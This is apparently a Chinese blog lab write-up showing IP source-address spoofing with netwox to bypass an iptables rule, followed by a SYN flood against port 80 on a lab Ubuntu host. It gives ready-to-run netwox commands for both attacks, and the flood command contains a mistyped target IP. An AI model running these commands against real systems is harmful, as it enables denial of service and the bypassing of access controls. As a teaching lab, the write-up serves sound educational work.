『网络协议攻防实验』IP源地址欺骗与dos攻击

本文演示了如何通过IP地址欺骗绕过防火墙,并利用SYN Flood实施拒绝服务攻击。实验环境包括Kali Linux作为攻击机及Ubuntu作为目标机。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

  • 靶机:seedubuntu 12.01,IP:192.168.199.134
  • 攻击机:Kali-2020.4,IP:192.168.199.129
  • 工具:netwox

IP地址欺骗

靶机开启tcpdump监听

sudo tcpdump -i eth0 tcp port 80 -n -nn

配置防火墙,伪造许可的规则,222是我们伪造的ip

sudo iptables -A INPUT -i eth0 -s 192.168.199.222/32 -j ACCEPT
sudo iptables -A INPUT -i eth0 -p all -j DROP

在Kali上利用netwox进行IP地址欺骗,伪装成192.168.199.222,突破防火墙限制

netwox 52 -E "0:1:2:3:4:5" -I "192.168.199.222" -e "00:0c:29:6f:6a:d5" -i "192.168.199.134"
  • -I:伪造的IP
  • -e:靶机MAC
  • -i:靶机IP

在这里插入图片描述

dos攻击

syn flood是建立在IP源地址欺骗之上的攻击

netwox 76 -i 19.168.199.134 -p 80

此时靶机的80端口会接收到大量不同来源的syn包

在这里插入图片描述

使用netstat查看连接情况,在防火墙的作用下攻击并未成功

netstat -antu | grep :80

在这里插入图片描述

接下来把防火墙关了,攻击成功,此时存在大量的syn半连接

iptables -F
iptables -X
netstat -antu | grep :80

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值